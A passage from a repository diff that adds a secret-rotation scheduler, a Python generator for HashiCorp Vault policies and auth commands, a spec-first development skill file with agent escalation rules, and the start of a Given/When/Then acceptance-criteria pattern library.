o = entry["owner"]
by_owner[o] = by_owner.get(o, 0) + 1
return {
"total_secrets": total,
"by_urgency": by_urgency,
"by_type": by_type,
"by_owner": by_owner,
"overdue_count": by_urgency.get("CRITICAL", 0),
"due_within_7d": by_urgency.get("HIGH", 0),
}
def print_human(schedule, summary, policy):
"""Print human-readable rotation plan."""
print(f"=== Secret Rotation Plan (Policy: {policy}) ===")
print(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M')}")
print(f"Total secrets: {summary['total_secrets']}")
print()
print("--- Urgency Summary ---")
for urg in ["CRITICAL", "HIGH", "MEDIUM", "LOW"]:
count = summary["by_urgency"].get(urg, 0)
if count > 0:
print(f" {urg:10s} {count}")
print()
if not schedule:
print("No secrets in inventory.")
return
print("--- Rotation Schedule ---")
print(f" {'Name':30s} {'Type':15s} {'Urgency':10s} {'Last Rotated':12s} {'Next Due':12s} {'Owner'}")
print(f" {'-'*30} {'-'*15} {'-'*10} {'-'*12} {'-'*12} {'-'*15}")
for entry in schedule:
overdue_marker = " **OVERDUE**" if entry["urgency"] == "CRITICAL" else ""
print(
f" {entry['name']:30s} {entry['type']:15s} {entry['urgency']:10s} "
f"{entry['last_rotated']:12s} {entry['next_rotation']:12s} "
f"{entry['owner']}{overdue_marker}"
)
print()
print("--- Action Items ---")
critical = [e for e in schedule if e["urgency"] == "CRITICAL"]
high = [e for e in schedule if e["urgency"] == "HIGH"]
if critical:
print(f" IMMEDIATE: Rotate {len(critical)} overdue secret(s):")
for e in critical:
print(f" - {e['name']} ({e['type']}, owner: {e['owner']})")
if high:
print(f" THIS WEEK: Rotate {len(high)} secret(s) due within 7 days:")
for e in high:
print(f" - {e['name']} (due: {e['next_rotation']}, owner: {e['owner']})")
if not critical and not high:
print(" No urgent rotations needed.")
def main():
parser = argparse.ArgumentParser(
description="Create rotation schedule from a secret inventory file.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent("""\
Policies:
30d Aggressive — all secrets rotate within 30 days max
60d Standard — 60-day maximum rotation window
90d Relaxed — 90-day maximum rotation window
Note: Some secret types (e.g., database passwords) have shorter
built-in defaults that override the policy maximum.
Example inventory file (secrets.json):
[
{"name": "prod-db", "type": "database", "store": "vault",
"last_rotated": "2026-01-15", "owner": "platform-team",
"environment": "production"}
]
"""),
)
parser.add_argument("--inventory", required=True, help="Path to JSON inventory file")
parser.add_argument(
"--policy",
required=True,
choices=["30d", "60d", "90d"],
help="Rotation policy (maximum rotation interval)",
)
parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
args = parser.parse_args()
policy_days = POLICY_DAYS[args.policy]
inventory = load_inventory(args.inventory)
schedule = compute_schedule(inventory, policy_days)
summary = build_summary(schedule)
result = {
"policy": args.policy,
"policy_days": policy_days,
"generated_at": datetime.now().isoformat(),
"summary": summary,
"schedule": schedule,
}
if args.json_output:
print(json.dumps(result, indent=2))
else:
print_human(schedule, summary, args.policy)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,302 @@
#!/usr/bin/env python3
"""Generate Vault policy and auth configuration from application requirements.
Produces HCL policy files and auth method setup commands for HashiCorp Vault
based on application name, auth method, and required secret paths.
Usage:
python vault_config_generator.py --app-name payment-service --auth-method approle --secrets "db-creds,api-key,tls-cert"
python vault_config_generator.py --app-name api-gateway --auth-method kubernetes --secrets "db-creds" --namespace production --json
"""
import argparse
import json
import sys
import textwrap
from datetime import datetime
# Default TTLs by auth method
AUTH_METHOD_DEFAULTS = {
"approle": {
"token_ttl": "1h",
"token_max_ttl": "4h",
"secret_id_num_uses": 1,
"secret_id_ttl": "10m",
},
"kubernetes": {
"token_ttl": "1h",
"token_max_ttl": "4h",
},
"oidc": {
"token_ttl": "8h",
"token_max_ttl": "12h",
},
}
# Secret type templates
SECRET_TYPE_MAP = {
"db-creds": {
"engine": "database",
"path": "database/creds/{app}-readonly",
"capabilities": ["read"],
"description": "Dynamic database credentials",
},
"db-admin": {
"engine": "database",
"path": "database/creds/{app}-readwrite",
"capabilities": ["read"],
"description": "Dynamic database admin credentials",
},
"api-key": {
"engine": "kv-v2",
"path": "secret/data/{env}/{app}/api-keys",
"capabilities": ["read"],
"description": "Static API keys (KV v2)",
},
"tls-cert": {
"engine": "pki",
"path": "pki/issue/{app}-cert",
"capabilities": ["create", "update"],
"description": "TLS certificate issuance",
},
"encryption": {
"engine": "transit",
"path": "transit/encrypt/{app}-key",
"capabilities": ["update"],
"description": "Transit encryption operations",
},
"ssh-cert": {
"engine": "ssh",
"path": "ssh/sign/{app}-role",
"capabilities": ["create", "update"],
"description": "SSH certificate signing",
},
"config": {
"engine": "kv-v2",
"path": "secret/data/{env}/{app}/config",
"capabilities": ["read"],
"description": "Application configuration secrets",
},
}
def parse_secrets(secrets_str):
"""Parse comma-separated secret types into list."""
secrets = [s.strip() for s in secrets_str.split(",") if s.strip()]
valid = []
unknown = []
for s in secrets:
if s in SECRET_TYPE_MAP:
valid.append(s)
else:
unknown.append(s)
return valid, unknown
def generate_policy_hcl(app_name, secrets, environment="production"):
"""Generate HCL policy document."""
lines = [
f'# Vault policy for {app_name}',
f'# Generated: {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}',
f'# Environment: {environment}',
'',
]
for secret_type in secrets:
tmpl = SECRET_TYPE_MAP[secret_type]
path = tmpl["path"].format(app=app_name, env=environment)
caps = ", ".join(f'"{c}"' for c in tmpl["capabilities"])
lines.append(f'# {tmpl["description"]}')
lines.append(f'path "{path}" {{')
lines.append(f' capabilities = [{caps}]')
lines.append('}')
lines.append('')
# Always deny sys paths
lines.append('# Deny admin paths')
lines.append('path "sys/*" {')
lines.append(' capabilities = ["deny"]')
lines.append('}')
return "\n".join(lines)
def generate_auth_config(app_name, auth_method, policy_name, namespace=None):
"""Generate auth method setup commands."""
commands = []
defaults = AUTH_METHOD_DEFAULTS.get(auth_method, {})
if auth_method == "approle":
cmd = (
f"vault write auth/approle/role/{app_name} \\\n"
f" token_ttl={defaults['token_ttl']} \\\n"
f" token_max_ttl={defaults['token_max_ttl']} \\\n"
f" secret_id_num_uses={defaults['secret_id_num_uses']} \\\n"
f" secret_id_ttl={defaults['secret_id_ttl']} \\\n"
f" token_policies=\"{policy_name}\""
)
commands.append({"description": f"Create AppRole for {app_name}", "command": cmd})
commands.append({
"description": "Fetch RoleID",
"command": f"vault read auth/approle/role/{app_name}/role-id",
})
commands.append({
"description": "Generate SecretID (single-use)",
"command": f"vault write -f auth/approle/role/{app_name}/secret-id",
})
elif auth_method == "kubernetes":
ns = namespace or "default"
cmd = (
f"vault write auth/kubernetes/role/{app_name} \\\n"
f" bound_service_account_names={app_name} \\\n"
f" bound_service_account_namespaces={ns} \\\n"
f" policies={policy_name} \\\n"
f" ttl={defaults['token_ttl']}"
)
commands.append({"description": f"Create Kubernetes auth role for {app_name}", "command": cmd})
elif auth_method == "oidc":
cmd = (
f"vault write auth/oidc/role/{app_name} \\\n"
f" bound_audiences=\"vault\" \\\n"
f" allowed_redirect_uris=\"https://vault.example.com/ui/vault/auth/oidc/oidc/callback\" \\\n"
f" user_claim=\"email\" \\\n"
f" oidc_scopes=\"openid,profile,email\" \\\n"
f" policies=\"{policy_name}\" \\\n"
f" ttl={defaults['token_ttl']}"
)
commands.append({"description": f"Create OIDC role for {app_name}", "command": cmd})
return commands
def build_output(app_name, auth_method, secrets, environment, namespace):
"""Build complete configuration output."""
valid_secrets, unknown_secrets = parse_secrets(secrets)
if not valid_secrets:
return {
"error": "No valid secret types provided",
"unknown": unknown_secrets,
"available_types": list(SECRET_TYPE_MAP.keys()),
}
policy_name = f"{app_name}-policy"
policy_hcl = generate_policy_hcl(app_name, valid_secrets, environment)
auth_commands = generate_auth_config(app_name, auth_method, policy_name, namespace)
secret_details = []
for s in valid_secrets:
tmpl = SECRET_TYPE_MAP[s]
secret_details.append({
"type": s,
"engine": tmpl["engine"],
"path": tmpl["path"].format(app=app_name, env=environment),
"capabilities": tmpl["capabilities"],
"description": tmpl["description"],
})
result = {
"app_name": app_name,
"auth_method": auth_method,
"environment": environment,
"policy_name": policy_name,
"policy_hcl": policy_hcl,
"auth_commands": auth_commands,
"secrets": secret_details,
"generated_at": datetime.now().isoformat(),
}
if unknown_secrets:
result["warnings"] = [f"Unknown secret type '{u}' — skipped. Available: {list(SECRET_TYPE_MAP.keys())}" for u in unknown_secrets]
if namespace:
result["namespace"] = namespace
return result
def print_human(result):
"""Print human-readable output."""
if "error" in result:
print(f"ERROR: {result['error']}")
if result.get("unknown"):
print(f" Unknown types: {', '.join(result['unknown'])}")
print(f" Available types: {', '.join(result['available_types'])}")
sys.exit(1)
print(f"=== Vault Configuration for {result['app_name']} ===")
print(f"Auth Method: {result['auth_method']}")
print(f"Environment: {result['environment']}")
print(f"Policy Name: {result['policy_name']}")
print()
if result.get("warnings"):
for w in result["warnings"]:
print(f"WARNING: {w}")
print()
print("--- Policy HCL ---")
print(result["policy_hcl"])
print()
print(f"Write policy: vault policy write {result['policy_name']} {result['policy_name']}.hcl")
print()
print("--- Auth Method Setup ---")
for cmd_info in result["auth_commands"]:
print(f"# {cmd_info['description']}")
print(cmd_info["command"])
print()
print("--- Secret Paths ---")
for s in result["secrets"]:
caps = ", ".join(s["capabilities"])
print(f" {s['type']:15s} {s['path']:50s} [{caps}]")
def main():
parser = argparse.ArgumentParser(
description="Generate Vault policy and auth configuration from application requirements.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent("""\
Secret types:
db-creds Dynamic database credentials (read-only)
db-admin Dynamic database credentials (read-write)
api-key Static API keys in KV v2
tls-cert TLS certificate issuance via PKI
encryption Transit encryption-as-a-service
ssh-cert SSH certificate signing
config Application configuration secrets
Examples:
%(prog)s --app-name payment-svc --auth-method approle --secrets "db-creds,api-key"
%(prog)s --app-name api-gw --auth-method kubernetes --secrets "db-creds,config" --namespace prod --json
"""),
)
parser.add_argument("--app-name", required=True, help="Application or service name")
parser.add_argument(
"--auth-method",
required=True,
choices=["approle", "kubernetes", "oidc"],
help="Vault auth method to configure",
)
parser.add_argument("--secrets", required=True, help="Comma-separated secret types (e.g., db-creds,api-key,tls-cert)")
parser.add_argument("--environment", default="production", help="Target environment (default: production)")
parser.add_argument("--namespace", help="Kubernetes namespace (for kubernetes auth method)")
parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
args = parser.parse_args()
result = build_output(args.app_name, args.auth_method, args.secrets, args.environment, args.namespace)
if args.json_output:
print(json.dumps(result, indent=2))
else:
print_human(result)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,586 @@
---
name: "spec-driven-workflow"
description: "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from specifications, or follow spec-first development practices."
---
# Spec-Driven Workflow — POWERFUL
## Overview
Spec-driven workflow enforces a single, non-negotiable rule: **write the specification BEFORE you write any code.** Not alongside. Not after. Before.
This is not documentation. This is a contract. A spec defines what the system MUST do, what it SHOULD do, and what it explicitly WILL NOT do. Every line of code you write traces back to a requirement in the spec. Every test traces back to an acceptance criterion. If it is not in the spec, it does not get built.
### Why Spec-First Matters
1. **Eliminates rework.** 60-80% of defects originate from requirements, not implementation. Catching ambiguity in a spec costs minutes; catching it in production costs days.
2. **Forces clarity.** If you cannot write what the system should do in plain language, you do not understand the problem well enough to write code.
3. **Enables parallelism.** Once a spec is approved, frontend, backend, QA, and documentation can all start simultaneously.
4. **Creates accountability.** The spec is the definition of done. No arguments about whether a feature is "complete" — either it satisfies the acceptance criteria or it does not.
5. **Feeds TDD directly.** Acceptance criteria in Given/When/Then format translate 1:1 into test cases. The spec IS the test plan.
### The Iron Law
```
NO CODE WITHOUT AN APPROVED SPEC.
NO EXCEPTIONS. NO "QUICK PROTOTYPES." NO "I'LL DOCUMENT IT LATER."
```
If the spec is not written, reviewed, and approved, implementation does not begin. Period.
---
## The Spec Format
Every spec follows this structure. No sections are optional — if a section does not apply, write "N/A — [reason]" so reviewers know it was considered, not forgotten.
### 1. Title and Context
```markdown
# Spec: [Feature Name]
**Author:** [name]
**Date:** [ISO 8601]
**Status:** Draft | In Review | Approved | Superseded
**Reviewers:** [list]
**Related specs:** [links]
## Context
[Why does this feature exist? What problem does it solve? What is the business
motivation? Include links to user research, support tickets, or metrics that
justify this work. 2-4 paragraphs maximum.]
```
### 2. Functional Requirements (RFC 2119)
Use RFC 2119 keywords precisely:
| Keyword | Meaning |
|---------|---------|
| **MUST** | Absolute requirement. Failing this means the implementation is non-conformant. |
| **MUST NOT** | Absolute prohibition. Doing this means the implementation is broken. |
| **SHOULD** | Recommended. May be omitted with documented justification. |
| **SHOULD NOT** | Discouraged. May be included with documented justification. |
| **MAY** | Optional. Purely at the implementer's discretion. |
```markdown
## Functional Requirements
- FR-1: The system MUST authenticate users via OAuth 2.0 PKCE flow.
- FR-2: The system MUST reject tokens older than 24 hours.
- FR-3: The system SHOULD support refresh token rotation.
- FR-4: The system MAY cache user profiles for up to 5 minutes.
- FR-5: The system MUST NOT store plaintext passwords under any circumstance.
```
Number every requirement. Use `FR-` prefix. Each requirement is a single, testable statement.
### 3. Non-Functional Requirements
```markdown
## Non-Functional Requirements
### Performance
- NFR-P1: Login flow MUST complete in < 500ms (p95) under normal load.
- NFR-P2: Token validation MUST complete in < 50ms (p99).
### Security
- NFR-S1: All tokens MUST be transmitted over TLS 1.2+.
- NFR-S2: The system MUST rate-limit login attempts to 5/minute per IP.
### Accessibility
- NFR-A1: Login form MUST meet WCAG 2.1 AA standards.
- NFR-A2: Error messages MUST be announced to screen readers.
### Scalability
- NFR-SC1: The system SHOULD handle 10,000 concurrent sessions.
### Reliability
- NFR-R1: The authentication service MUST maintain 99.9% uptime.
```
### 4. Acceptance Criteria (Given/When/Then)
Every functional requirement maps to one or more acceptance criteria. Use Gherkin syntax:
```markdown
## Acceptance Criteria
### AC-1: Successful login (FR-1)
Given a user with valid credentials
When they submit the login form with correct email and password
Then they receive a valid access token
And they are redirected to the dashboard
And the login event is logged with timestamp and IP
### AC-2: Expired token rejection (FR-2)
Given a user with an access token issued 25 hours ago
When they make an API request with that token
Then they receive a 401 Unauthorized response
And the response body contains error code "TOKEN_EXPIRED"
And they are NOT redirected (API clients handle their own flow)
### AC-3: Rate limiting (NFR-S2)
Given an IP address that has made 5 failed login attempts in the last minute
When a 6th login attempt arrives from that IP
Then the request is rejected with 429 Too Many Requests
And the response includes a Retry-After header
```
### 5. Edge Cases and Error Scenarios
```markdown
## Edge Cases
- EC-1: User submits login form with empty email → Show validation error, do not hit API.
- EC-2: OAuth provider is down → Show "Service temporarily unavailable", retry after 30s.
- EC-3: User has account but no password (social-only) → Redirect to social login.
- EC-4: Concurrent login from two devices → Both sessions are valid (no single-session enforcement).
- EC-5: Token expires mid-request → Complete the current request, return warning header.
```
### 6. API Contracts
Define request/response shapes using TypeScript-style notation:
```markdown
## API Contracts
### POST /api/auth/login
Request:
```typescript
interface LoginRequest {
email: string; // MUST be valid email format
password: string; // MUST be 8-128 characters
rememberMe?: boolean; // Default: false
}
```
Success Response (200):
```typescript
interface LoginResponse {
accessToken: string; // JWT, expires in 24h
refreshToken: string; // Opaque, expires in 30d
expiresIn: number; // Seconds until access token expires
user: {
id: string;
email: string;
displayName: string;
};
}
```
Error Response (401):
```typescript
interface AuthError {
error: "INVALID_CREDENTIALS" | "TOKEN_EXPIRED" | "ACCOUNT_LOCKED";
message: string;
retryAfter?: number; // Seconds, present for rate-limited responses
}
```
```
### 7. Data Models
```markdown
## Data Models
### User
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | Primary key, auto-generated |
| email | string | Unique, max 255 chars, valid email format |
| passwordHash | string | bcrypt, never exposed via API |
| createdAt | timestamp | UTC, immutable |
| lastLoginAt | timestamp | UTC, updated on each login |
| loginAttempts | integer | Reset to 0 on successful login |
| lockedUntil | timestamp | Null if not locked |
```
### 8. Out of Scope
Explicit exclusions prevent scope creep:
```markdown
## Out of Scope
- OS-1: Multi-factor authentication (separate spec: SPEC-042)
- OS-2: Social login providers beyond Google and GitHub
- OS-3: Admin impersonation of user accounts
- OS-4: Password complexity rules beyond minimum length (deferred to v2)
- OS-5: Session management UI (users cannot see/revoke active sessions yet)
```
If someone asks for an out-of-scope item during implementation, point them to this section. Do not build it.
---
## Bounded Autonomy Rules
These rules define when an agent (human or AI) MUST stop and ask for guidance vs. when they can proceed independently.
### STOP and Ask When:
1. **Scope creep detected.** The implementation requires something not in the spec. Even if it seems obviously needed, STOP. The spec might have excluded it deliberately.
2. **Ambiguity exceeds 30%.** If you cannot determine the correct behavior from the spec for more than 30% of a given requirement, the spec is incomplete. Do not guess.
3. **Breaking changes required.** The implementation would change an existing API contract, database schema, or public interface. Always escalate.
4. **Security implications.** Any change that touches authentication, authorization, encryption, or PII handling requires explicit approval.
5. **Performance characteristics unknown.** If a requirement says "MUST complete in < 500ms" but you have no way to measure or guarantee that, escalate before implementing a guess.
6. **Cross-team dependencies.** If the spec requires coordination with another team or service, confirm the dependency before building against it.
### Continue Autonomously When:
1. **Spec is clear and unambiguous** for the current task.
2. **All acceptance criteria have passing tests** and you are refactoring internals.
3. **Changes are non-breaking** — no public API, schema, or behavior changes.
4. **Implementation is a direct translation** of a well-defined acceptance criterion.
5. **Error handling follows established patterns** already documented in the codebase.
### Escalation Protocol
When you must stop, provide:
```markdown
## Escalation: [Brief Title]
**Blocked on:** [requirement ID, e.g., FR-3]
**Question:** [Specific, answerable question — not "what should I do?"]
**Options considered:**
A. [Option] — Pros: [...] Cons: [...]
B. [Option] — Pros: [...] Cons: [...]
**My recommendation:** [A or B, with reasoning]
**Impact of waiting:** [What is blocked until this is resolved?]
```
Never escalate without a recommendation. Never present an open-ended question. Always give options.
See `references/bounded_autonomy_rules.md` for the complete decision matrix.
---
## Workflow — 6 Phases
### Phase 1: Gather Requirements
**Goal:** Understand what needs to be built and why.
1. **Interview the user.** Ask:
- What problem does this solve?
- Who are the users?
- What does success look like?
- What explicitly should NOT be built?
2. **Read existing code.** Understand the current system before proposing changes.
3. **Identify constraints.** Performance budgets, security requirements, backward compatibility.
4. **List unknowns.** Every unknown is a risk. Surface them now, not during implementation.
**Exit criteria:** You can explain the feature to someone unfamiliar with the project in 2 minutes.
### Phase 2: Write Spec
**Goal:** Produce a complete spec document following The Spec Format above.
1. Fill every section of the template. No section left blank.
2. Number all requirements (FR-*, NFR-*, AC-*, EC-*, OS-*).
3. Use RFC 2119 keywords precisely.
4. Write acceptance criteria in Given/When/Then format.
5. Define API contracts with TypeScript-style types.
6. List explicit exclusions in Out of Scope.
**Exit criteria:** The spec can be handed to a developer who was not in the requirements meeting, and they can implement the feature without asking clarifying questions.
### Phase 3: Validate Spec
**Goal:** Verify the spec is complete, consistent, and implementable.
Run `spec_validator.py` against the spec file:
```bash
python spec_validator.py --file spec.md --strict
```
Manual validation checklist:
- [ ] Every functional requirement has at least one acceptance criterion
- [ ] Every acceptance criterion is testable (no subjective language)
- [ ] API contracts cover all endpoints mentioned in requirements
- [ ] Data models cover all entities mentioned in requirements
- [ ] Edge cases cover failure modes for every external dependency
- [ ] Out of scope is explicit about what was considered and rejected
- [ ] Non-functional requirements have measurable thresholds
**Exit criteria:** Spec scores 80+ on validator, and all manual checklist items pass.
### Phase 4: Generate Tests
**Goal:** Extract test cases from acceptance criteria before writing implementation code.
Run `test_extractor.py` against the approved spec:
```bash
python test_extractor.py --file spec.md --framework pytest --output tests/
```
1. Each acceptance criterion becomes one or more test cases.
2. Each edge case becomes a test case.
3. Tests are stubs — they define the assertion but not the implementation.
4. All tests MUST fail initially (red phase of TDD).
**Exit criteria:** You have a test file where every test fails with "not implemented" or equivalent.
### Phase 5: Implement
**Goal:** Write code that makes failing tests pass, one acceptance criterion at a time.
1. Pick one acceptance criterion (start with the simplest).
2. Make its test(s) pass with minimal code.
3. Run the full test suite — no regressions.
4. Commit.
5. Pick the next acceptance criterion. Repeat.
**Rules:**
- Do NOT implement anything not in the spec.
- Do NOT optimize before all acceptance criteria pass.
- Do NOT refactor before all acceptance criteria pass.
- If you discover a missing requirement, STOP and update the spec first.
**Exit criteria:** All tests pass. All acceptance criteria satisfied.
### Phase 6: Self-Review
**Goal:** Verify implementation matches spec before marking done.
Run through the Self-Review Checklist below. If any item fails, fix it before declaring the task complete.
---
## Self-Review Checklist
Before marking any implementation as done, verify ALL of the following:
- [ ] **Every acceptance criterion has a passing test.** No exceptions. If AC-3 exists, a test for AC-3 exists and passes.
- [ ] **Every edge case has a test.** EC-1 through EC-N all have corresponding test cases.
- [ ] **No scope creep.** The implementation does not include features not in the spec. If you added something, either update the spec or remove it.
- [ ] **API contracts match implementation.** Request/response shapes in code match the spec exactly. Field names, types, status codes — all of it.
- [ ] **Error scenarios tested.** Every error response defined in the spec has a test that triggers it.
- [ ] **Non-functional requirements verified.** If the spec says < 500ms, you have evidence (benchmark, load test, profiling) that it meets the threshold.
- [ ] **Data model matches.** Database schema matches the spec. No extra columns, no missing constraints.
- [ ] **Out-of-scope items not built.** Double-check that nothing from the Out of Scope section leaked into the implementation.
---
## Integration with TDD Guide
Spec-driven workflow and TDD are complementary, not competing:
```
Spec-Driven Workflow TDD (Red-Green-Refactor)
───────────────────── ──────────────────────────
Phase 1: Gather Requirements
Phase 2: Write Spec
Phase 3: Validate Spec
Phase 4: Generate Tests ──→ RED: Tests exist and fail
Phase 5: Implement ──→ GREEN: Minimal code to pass
Phase 6: Self-Review ──→ REFACTOR: Clean up internals
```
**The handoff:** Spec-driven workflow produces the test stubs (Phase 4). TDD takes over from there. The spec tells you WHAT to test. TDD tells you HOW to implement.
Use `engineering-team/tdd-guide` for:
- Red-green-refactor cycle discipline
- Coverage analysis and gap detection
- Framework-specific test patterns (Jest, Pytest, JUnit)
Use `engineering/spec-driven-workflow` for:
- Defining what to build before building it
- Acceptance criteria authoring
- Completeness validation
- Scope control
---
## Examples
### Full Spec: User Password Reset
```markdown
# Spec: Password Reset Flow
**Author:** Engineering Team
**Date:** 2026-03-25
**Status:** Approved
## Context
Users who forget their passwords currently have no self-service recovery option.
Support receives ~200 password reset requests per week, costing approximately
8 hours of support time. This feature eliminates that burden entirely.
## Functional Requirements
- FR-1: The system MUST allow users to request a password reset via email.
- FR-2: The system MUST send a reset link that expires after 1 hour.
- FR-3: The system MUST invalidate all previous reset links when a new one is requested.
- FR-4: The system MUST enforce minimum password length of 8 characters on reset.
- FR-5: The system MUST NOT reveal whether an email exists in the system.
- FR-6: The system SHOULD log all reset attempts for audit purposes.
## Acceptance Criteria
### AC-1: Request reset (FR-1, FR-5)
Given a user on the password reset page
When they enter any email address and submit
Then they see "If an account exists, a reset link has been sent"
And the response is identical whether the email exists or not
### AC-2: Valid reset link (FR-2)
Given a user who received a reset email 30 minutes ago
When they click the reset link
Then they see the password reset form
### AC-3: Expired reset link (FR-2)
Given a user who received a reset email 2 hours ago
When they click the reset link
Then they see "This link has expired. Please request a new one."
### AC-4: Previous links invalidated (FR-3)
Given a user who requested two reset emails
When they click the link from the first email
Then they see "This link is no longer valid."
## Edge Cases
- EC-1: User submits reset for non-existent email → Same success message (FR-5).
- EC-2: User clicks reset link twice → Second click shows "already used" if password was changed.
- EC-3: Email delivery fails → Log error, do not retry automatically.
- EC-4: User requests reset while already logged in → Allow it, do not force logout.
## Out of Scope
- OS-1: Security questions as alternative reset method.
- OS-2: SMS-based password reset.
- OS-3: Admin-initiated password reset (separate spec).
```
### Extracted Test Cases (from above spec)
```python
# Generated by test_extractor.py --framework pytest
class TestPasswordReset:
def test_ac1_request_reset_existing_email(self):
"""AC-1: Request reset with existing email shows generic message."""
# Given a user on the password reset page
# When they enter a registered email and submit
# Then they see "If an account exists, a reset link has been sent"
raise NotImplementedError("Implement this test")
def test_ac1_request_reset_nonexistent_email(self):
"""AC-1: Request reset with unknown email shows same generic message."""
# Given a user on the password reset page
# When they enter an unregistered email and submit
# Then they see identical response to existing email case
raise NotImplementedError("Implement this test")
def test_ac2_valid_reset_link(self):
"""AC-2: Reset link works within expiry window."""
raise NotImplementedError("Implement this test")
def test_ac3_expired_reset_link(self):
"""AC-3: Reset link rejected after 1 hour."""
raise NotImplementedError("Implement this test")
def test_ac4_previous_links_invalidated(self):
"""AC-4: Old reset links stop working when new one is requested."""
raise NotImplementedError("Implement this test")
def test_ec1_nonexistent_email_same_response(self):
"""EC-1: Non-existent email produces identical response."""
raise NotImplementedError("Implement this test")
def test_ec2_reset_link_used_twice(self):
"""EC-2: Already-used reset link shows appropriate message."""
raise NotImplementedError("Implement this test")
```
---
## Anti-Patterns
### 1. Coding Before Spec Approval
**Symptom:** "I'll start coding while the spec is being reviewed."
**Problem:** The review will surface changes. Now you have code that implements a rejected design.
**Rule:** Implementation does not begin until spec status is "Approved."
### 2. Vague Acceptance Criteria
**Symptom:** "The system should work well" or "The UI should be responsive."
**Problem:** Untestable. What does "well" mean? What does "responsive" mean?
**Rule:** Every acceptance criterion must be verifiable by a machine. If you cannot write a test for it, rewrite the criterion.
### 3. Missing Edge Cases
**Symptom:** Happy path is specified, error paths are not.
**Problem:** Developers invent error handling on the fly, leading to inconsistent behavior.
**Rule:** For every external dependency (API, database, file system, user input), specify at least one failure scenario.
### 4. Spec as Post-Hoc Documentation
**Symptom:** "Let me write the spec now that the feature is done."
**Problem:** This is documentation, not specification. It describes what was built, not what should have been built. It cannot catch design errors because the design is already frozen.
**Rule:** If the spec was written after the code, it is not a spec. Relabel it as documentation.
### 5. Gold-Plating Beyond Spec
**Symptom:** "While I was in there, I also added..."
**Problem:** Untested code. Unreviewed design. Potential for subtle bugs in the "bonus" feature.
**Rule:** If it is not in the spec, it does not get built. File a new spec for additional features.
### 6. Acceptance Criteria Without Requirement Traceability
**Symptom:** AC-7 exists but does not reference any FR-* or NFR-*.
**Problem:** Orphaned criteria mean either a requirement is missing or the criterion is unnecessary.
**Rule:** Every AC-* MUST reference at least one FR-* or NFR-*.
### 7. Skipping Validation
**Symptom:** "The spec looks fine, let's just start."
**Problem:** Missing sections discovered during implementation cause blocking delays.
**Rule:** Always run `spec_validator.py --strict` before starting implementation. Fix all warnings.
---
## Cross-References
- **`engineering-team/tdd-guide`** — Red-green-refactor cycle, test generation, coverage analysis. Use after Phase 4 of this workflow.
- **`engineering/focused-fix`** — Deep-dive feature repair. When a spec-driven implementation has systemic issues, use focused-fix for diagnosis.
- **`engineering/rag-architect`** — If the feature involves retrieval or knowledge systems, use rag-architect for the technical design within the spec.
- **`references/spec_format_guide.md`** — Complete template with section-by-section explanations.
- **`references/bounded_autonomy_rules.md`** — Full decision matrix for when to stop vs. continue.
- **`references/acceptance_criteria_patterns.md`** — Pattern library for writing Given/When/Then criteria.
---
## Tools
| Script | Purpose | Key Flags |
|--------|---------|-----------|
| `spec_generator.py` | Generate spec template from feature name/description | `--name`, `--description`, `--format`, `--json` |
| `spec_validator.py` | Validate spec completeness (0-100 score) | `--file`, `--strict`, `--json` |
| `test_extractor.py` | Extract test stubs from acceptance criteria | `--file`, `--framework`, `--output`, `--json` |
```bash
# Generate a spec template
python spec_generator.py --name "User Authentication" --description "OAuth 2.0 login flow"
# Validate a spec
python spec_validator.py --file specs/auth.md --strict
# Extract test cases
python test_extractor.py --file specs/auth.md --framework pytest --output tests/test_auth.py
```

View File

@@ -0,0 +1,497 @@
# Acceptance Criteria Patterns
A pattern library for writing Given/When/Then acceptance criteria across common feature types. Use these as starting points — adapt to your domain.
---
## Pattern Structure
Every acceptance criterion follows this structure:
```
### AC-N: [Descriptive name] (FR-N, NFR-N)
Given [precondition — the system/user is in this state]
When [trigger — the user or system performs this action]
Then [outcome — this observable, testable result occurs]
And [additional outcome — and this also happens]
```
**Rules:**
1. One scenario per AC. Multiple Given/When/Then blocks = multiple ACs.
2. Every AC references at least one FR-* or NFR-*.
3. Outcomes must be observable and testable — no subjective language.
4. Preconditions must be achievable in a test setup.
---
## Authentication Patterns
### Login — Happy Path
```markdown
### AC-1: Successful login with valid credentials (FR-1)
Given a registered user with email "user@example.com" and password "V@lidP4ss!"
When they POST /api/auth/login with email "user@example.com" and password "V@lidP4ss!"
Then the response status is 200
And the response body contains a valid JWT access token
And the response body contains a refresh token
And the access token expires in 24 hours
```
### Login — Invalid Credentials
```markdown
### AC-2: Login rejected with wrong password (FR-1)
Given a registered user with email "user@example.com"
When they POST /api/auth/login with email "user@example.com" and an incorrect password
Then the response status is 401
And the response body contains error code "INVALID_CREDENTIALS"
And no token is issued
And the failed attempt is logged
```
### Login — Account Locked
```markdown
### AC-3: Login rejected for locked account (FR-1, NFR-S2)
Given a user whose account is locked due to 5 consecutive failed login attempts
When they POST /api/auth/login with correct credentials
Then the response status is 403
And the response body contains error code "ACCOUNT_LOCKED"
And the response includes a "retryAfter" field with seconds until unlock
```
### Token Refresh
```markdown
### AC-4: Token refresh with valid refresh token (FR-3)
Given a user with a valid, non-expired refresh token
When they POST /api/auth/refresh with that refresh token
Then the response status is 200
And a new access token is issued
And the old refresh token is invalidated
And a new refresh token is issued (rotation)
```
### Logout
```markdown
### AC-5: Logout invalidates session (FR-4)
Given an authenticated user with a valid access token
When they POST /api/auth/logout with that token
Then the response status is 204
And the access token is no longer accepted for API calls
And the refresh token is invalidated
```
---
## CRUD Patterns
### Create
```markdown
### AC-6: Create resource with valid data (FR-1)
Given an authenticated user with "editor" role
When they POST /api/resources with valid payload {name: "Test", type: "A"}
Then the response status is 201
And the response body contains the created resource with a generated UUID
And the resource's "createdAt" field is set to the current UTC timestamp
And the resource's "createdBy" field matches the authenticated user's ID
```
### Create — Validation Failure
```markdown
### AC-7: Create resource rejected with invalid data (FR-1)
Given an authenticated user
When they POST /api/resources with payload missing required field "name"
Then the response status is 400
And the response body contains error code "VALIDATION_ERROR"
